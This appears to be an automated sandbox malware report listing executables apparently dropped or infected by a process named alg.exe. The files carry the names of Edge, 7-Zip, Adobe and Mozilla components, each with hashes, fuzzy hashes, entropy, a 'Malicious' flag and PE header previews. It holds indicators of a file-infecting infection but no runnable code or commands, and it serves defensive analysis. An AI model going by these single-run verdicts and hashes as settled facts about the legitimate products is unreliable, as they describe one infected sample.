Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.14548043248358
Encrypted:	false
SSDEEP:	24576:AiD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:zD2VmAyiwIb8boQlDmg27RnWGj
MD5:	2195B2F51FB971E401131E845D3D794F
SHA1:	41A95B5E06FE564DF846569604487F940D047987
SHA-256:	62B4ACBC5FEDF4751D5C689D50F3BB9A4F52F2D26BF601761301343619F5C49D
SHA-512:	D76CCF1887C94439CCDA9AF830409DE434C98CC20715EF0F054833FBAFFD6654C9AB2FF2A917B52D973EC622B1C2B9506E8A824CF0E7B44C6DF7CFC85C1A5E2E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.950744770081253
Encrypted:	false
SSDEEP:	49152:CfD3zO9ZhBGloizM3HRNr00dDmg27RnWGj:4DaalxzM00dD527BWG
MD5:	EE66E250FFA30D92568FA3119CD00A42
SHA1:	86B96189EEEC516F99553F1536E8D6EECE1445DF
SHA-256:	AF3D5FE011E5B6ACBBA2FB2BE542AA7129D986C059F9E31EE1F4E439A0C73A36
SHA-512:	DBE07D0F6EDD28891205F6CC283F8F0BA068AB1152843460C43ED7B24AFE93E438DE2995194ABCED93806FD07260BEDD99892A43BF7C4622975DA7E9837D07C1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......F,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.824607789794217
Encrypted:	false
SSDEEP:	49152:9TaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhCDmg27RnN:0I72LvkrDpbxJRoIMVD527BWG
MD5:	BAEB391C792EF29C69C2674A24C724BA
SHA1:	C315E5FCE7DADB92E44FC221688AF41BF221E152
SHA-256:	716DCB938DE64EC2E664EE8C42EB7E62307A6F9D10ACFDC23575C9583CABF4ED
SHA-512:	5C5629F8AA436C864FB50D0CAE5FB4A4F089A2A560BF0EC545BE722046A0B38A7ABD1BF2BFDFB11EEBA6A41851E0755D9496DFEBE8D8B1E49253CEE3EA23D8CD
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.097244697628849
Encrypted:	false
SSDEEP:	24576:oW9Jml9mmijviMnF+ZxmQWcbLw8VxsqjnhMgeiCl7G0nehbGZpbD:oWnm5iOMkjmQWkVFDmg27RnWGj
MD5:	DE1CBA1E46123C97F5943E324B00518C
SHA1:	FFB7808E7519ABEEB6DDC7D5D1F24DE683957B98
SHA-256:	164B012FE12094517537B0D42135E774A4252ED181FF3D57CBC432ED52F3CF2E
SHA-512:	0202C4904317C36D3491F88EA9FFC17A92676D4D84E674F827CF2F481E018F57C24D1A43FE2EEC770EEB03350BA03A7B3DC621C8B271C03DDBDAAD2E9481DDA7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......8 ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166351995532331
Encrypted:	false
SSDEEP:	24576:0wNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:0wNPdQO7BJTfmEgDmg27RnWGj
MD5:	7D30E654C9C35674CAE2833F744B972C
SHA1:	A394E04F38D91D2743597A7F8EA07F4EA10F7A20
SHA-256:	8AFC16C0303E215962A205083FD8F6A096FC51C76F0D93F04BAEBA8F32AAE7BD
SHA-512:	A7E8E5B75F6A784F5CB8C8B3DA9174E4A2CF051E04510C4650779E4A522B6A89EC8902FB9CC05239AA72307FEB3445DC29B3164C9DC5B43E30AD73A111EB0C4B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145489742832482
Encrypted:	false
SSDEEP:	24576:6iD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:pD2VmAyiwIb8boQlDmg27RnWGj
MD5:	AFB207CF851D9ADF74DEF18A0F668DC5
SHA1:	110022500FC0D91296D8B0C9A15601B4D14B401D
SHA-256:	7E88D2A1B4413B141189CF2F38BF6A9F1967DB56D15DB21406F826A82A4DF74F
SHA-512:	055A94DAD5D7912139269116BEACFD8B64AA3A61539E0BC053DBF7D1F7FD8503B07AB79F060BE7ECA0F122E26CAEE0EB72AC6440D1F1D474A3C4DDA9AB083D90
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166364178231097
Encrypted:	false
SSDEEP:	24576:RwNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:RwNPdQO7BJTfmEgDmg27RnWGj
MD5:	92A31A1AA9C6E8701A63D717668F7426
SHA1:	4588816504506D6A5E504E3899F9CFE6C6D82410
SHA-256:	5F2111A572DBB8378D4F52914149BB0D0490618D060503FAB33D2C45B8E5183F
SHA-512:	C903B62C6A7675619E5E26B92B77F82A287C77EA629EBC2CBE4D2AC0FF1974F2D27CD90D42729FFE8831C2EF91E8D767D8145ED96D360FD5DEC2E91FB4075E9F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1325568
Entropy (8bit):	5.141853111232347
Encrypted:	false
SSDEEP:	24576:e4lbht6BHwsqjnhMgeiCl7G0nehbGZpbD:flNtqHsDmg27RnWGj
MD5:	9DC2FF769B58C0D1A4734FBD739F4626
SHA1:	385E83595DC49711DEA355328364028DAD836679
SHA-256:	4D370478F02E44FC5EB6F001008501D47B521A37EAB3BB1E1818327A9C7A9DA4
SHA-512:	87B93846E6747D8F6C04964BA8927AC754AFB440B1C0E82D1EBE59C3E06C1E155C74C671A17931496DCD4C62CB29A812C31C737DCE5354D26CB601313BD742D9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................#.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138860525917477
Encrypted:	false
SSDEEP:	12288:FIkOkTB+wEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:FIxkTBVEsqjnhMgeiCl7G0nehbGZpbD
MD5:	94FF84D754D03C3D860F8177AE55A8ED
SHA1:	1638291E81C10339881EFEA47CC51BC19CEF949C
SHA-256:	7758D1558219889F36A28C5B0F17FF1B5C1F512421F2C35E122F6FCD03743C2A
SHA-512:	D92DECDA9C0E79D4D3410ACEDA3F66F5DCB5F9150E4C6E0C7EDEF02E03CB8A2E6FC47AD78CB7C406601C0ED23F9848550E33F5063E2D82C8276CBDA4161E72BF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@..................................z......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335296
Entropy (8bit):	5.236780575376811
Encrypted:	false
SSDEEP:	12288:Q4lssmroCPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:QcssmrNsqjnhMgeiCl7G0nehbGZpbD
MD5:	A781510BA6703208BE8DABA99BD1537B
SHA1:	4A0928620C77D49ACD641D6D4D2F3711EBE8B859
SHA-256:	B0A3B3117EAB0C779B5D773C42232B030659B032EEE19D9D8D31BD54B540E094
SHA-512:	DC60E49C296AA29C99018E01F4B1773FC3042AEBA4761798DC806B84DCE99580A6DF68F2E1D1E66F749964C8268931C66228E40D9C8AFD971A7B8E60823E1F0F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................p.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	5.3385326365175825
Encrypted:	false
SSDEEP:	24576:U03cT++foSBWU2YxhkgOsqjnhMgeiCl7G0nehbGZpbD:r3cK+foQWU2YnPiDmg27RnWGj
MD5:	691AABF737D296DCF26C83B966353D65
SHA1:	289A11EF4A6455581A668B22196E77497D802910
SHA-256:	F3C5F5D2914A9C1499122FD27DFE0A6A8C0163DCA1E022EAE2251429C8B95E5B
SHA-512:	4C97ECEF9446E901233E9BB10293CFAC8DFA0723BFF2E91A55FD8CA434BE9943AA673E7DE9899BDBB518A38AD4B155634CA144293FD5969A90D0E0172FDCFCF6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................U........................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138910383569102
Encrypted:	false
SSDEEP:	12288:PbrNRzB+NuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PbBRzBgusqjnhMgeiCl7G0nehbGZpbD
MD5:	939C41B33928B6B8486EFE76466BFCB3
SHA1:	B0F25088D38F4603DEF37624B7022FEB34C673BC
SHA-256:	C671D9404C18E3CF9D08B6EF73382CB44B8AC17F7BDF6BA020985B0BA198FEEB
SHA-512:	1168AE6EB77A3724FFA4AE80DCE362D279CEBB4A9D68EEB69646835F715649F1959588EC07310D9DB958ECEECE459B66E692A2B1D0A1190FCAF8A48599412B3C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.940561354484731
Encrypted:	false
SSDEEP:	49152:ly53w24gQu3TPZ2psFkiSqwoz4Dmg27RnWGj:lyFQgZqsFki+oz4D527BWG
MD5:	074A7B7E0310030ED68C537694D44058
SHA1:	71B8A7B9C2E97EACDE1EE2F07D772D3843A56473
SHA-256:	2C9503C0702841306786098C45C7AFEA639812F488DAD7570AD1B238CC6E0301
SHA-512:	0CAEEC1F64E4C6EC76E9F94C81C5FC4369DAFC3C11CA0E3F40D98F2F9B64B0DDE5453B62EBD85B1EDB651939182C46B773009EF9D5EC77FD66927629E9F75B5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.840051517114781
Encrypted:	false
SSDEEP:	24:sd3oiRZWt0WmI4auWqeNPWlb7W07eqWqNq3eWcv+lGgMKW0a:sWiRE5mHKjNuUdqk3BnSD
MD5:	522396593783FBDB3AB00ED2C8638482
SHA1:	A7C2808E7DF43CC951D669725CD1435CB6BC7AF2
SHA-256:	D56908D510FA58578311F481D1D6B2C19F17D122C8437C4A07E7ABA8D1E5F8F1
SHA-512:	3134F3ADC1B4F0E5CF3D35E7CE4DE956F6E480EF9C8C7F93177A8079DA8D22788088311AA12300562CE42A4D55799ADAAE61156AB1F7603296D7002DE18BCA3B
Malicious:	false
Reputation:	unknown
Preview:	2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-22 12:55:03-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-22 12:55:03-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-22 12:55:0

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347835935053495
Encrypted:	false
SSDEEP:	24576:MQVTZu0JhsqjnhMgeiCl7G0nehbGZpbD:DVTZugDmg27RnWGj
MD5:	27652B586B1E4F9793415650BFFAE22A
SHA1:	786787A72EF8F82F62E0361A7B43E3DFC3B90076
SHA-256:	10D160BA2BBFD600BF597173FA46AB13CFB53743C4586D11C1687E4743A860E9
SHA-512:	E914430C3599644A35B27065BB9C9A5C004C3B50B7076C90EB931073A22592B119B9BA46E81F26C5D679F156258D9A90FCA8DE9C1FCA515A2945EEDF1388AFCF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	5.62311620283488
Encrypted:	false
SSDEEP:	24576:x+gkESfh4CoWsqjnhMgeiCl7G0nehbGZpbD:4gkE+SMDmg27RnWGj
MD5:	32C36587EE77F098A75A965F9E022316
SHA1:	4B2C13FB0ACBA3446E599D9C1CDDDE55F1F5809D
SHA-256:	30D11849F6043E24965DE076B8DA9F6AAD1631F6461E63989B841CF48D753B08
SHA-512:	76B467B195A17608A3D1ECF4FF8F9F5EB9614BFFF41594CECD63A74EB09F40E5DBE3A21BA547C30EAC76C8094B82D4D3075CD00C3E584BC0797D4C8199B795CE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.096639199471615
Encrypted:	false
SSDEEP:	24576:zBpDRmi78gkPXlyo0GtjrJsqjnhMgeiCl7G0nehbGZpbD:VNRmi78gkPX4o0GtjRDmg27RnWGj
MD5:	92804E38BF844B0C40BC38AD8D099628
SHA1:	30FDDC318708C542F111AFF86439BD5BAFD2D1C8
SHA-256:	80F4C88F45A452543C06C957B248B370752F3A8D03CE7A0B6154B4BC9DEB3E3A
SHA-512:	D5C4B793F0557B92E1EF9A0FFA38BCB6EC7C1352F7813343E387A16BE1E556D927A545EE41609E0F2564A5AFD8A259E15E8D96EDCB1EA41ACA151F33E0C5C934
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.229050955977382
Encrypted:	false
SSDEEP:	24576:HLOS2oTPIXVWsqjnhMgeiCl7G0nehbGZpbD:x/TpDmg27RnWGj
MD5:	17E21D40CF43487964359F4A7F1C3446
SHA1:	B77FB6CA90CCCCD09CE30B5BBFEDD9506195E2C6
SHA-256:	C37597884634222A59E5ADCA001B8CF746C2D6542A29CCA35011F86B4A4FFD81
SHA-512:	3786C1B659B7FC8FD7F777F7F64D52D97CDE11091FF94D762E946178B393A07E529D4F42152149E82A5A6840CFC649EAB12BFCED3322052A6F0F87E335C87D39
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	5.031188333072859
Encrypted:	false
SSDEEP:	12288:/1wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/1wsqjnhMgeiCl7G0nehbGZpbD
MD5:	0CB151B38B397A60877F1F22A973B056
SHA1:	B1EFA30388E548AD06A32F157B99DBABAC2E217E
SHA-256:	69F9FFD2A94773AE68F9E1DB4E555B6B7DD61C884F5F950BA5098A96267E63F7
SHA-512:	DDC4C1E550C614DD3C986F4B1A79C81DF927EE0BA52A94369B425503C89438D46080A6392CDE9A40D891D608C0BF2808862746150FF5D8094E32C7881DB1B98D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................z.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.712023847288794
Encrypted:	false
SSDEEP:	12288:zRudzLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zAdzLsqjnhMgeiCl7G0nehbGZpbD
MD5:	C0936C49C0A494383F0183E06B3DF861
SHA1:	DA80B2755C095515B47032B24D62779536247B67
SHA-256:	60DC5F393EC879C230E508F8ADC43F38E0297C336EEAEDF186A0049EB686830C
SHA-512:	879CA98A151690B3F3E0A9CEAADD679919AC8F5D8C9D46290745F9F575C8F559CD7B90AD4ABCA2979AEF8505E280CCEB5B58F56965C1621E90D5A1825E7921BF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@...................................."..... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1457664
Entropy (8bit):	5.082148451669624
Encrypted:	false
SSDEEP:	12288:5vnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FsqjnhMgeiCl7G0nehbGZpbD
MD5:	3D6CAE11D73927C92E05B3A57D537066
SHA1:	575299EA7E66ED3BB76140E423A7E249B97A1701
SHA-256:	4EA0F8B764D3B8EF9B9F3F1EFE8F7AF6536374188FA9F9DD40ADAFA360008794
SHA-512:	EEEB98CB95FB4077D127A8BA63CAC2BD47C71B410B1E4299289D5144ED1515026197E58F379E53DD894E83A13554B2E24A5CC66C82A7A9D64AE724E7B28F7B23
Malicious:	true
Reputation:	unknown
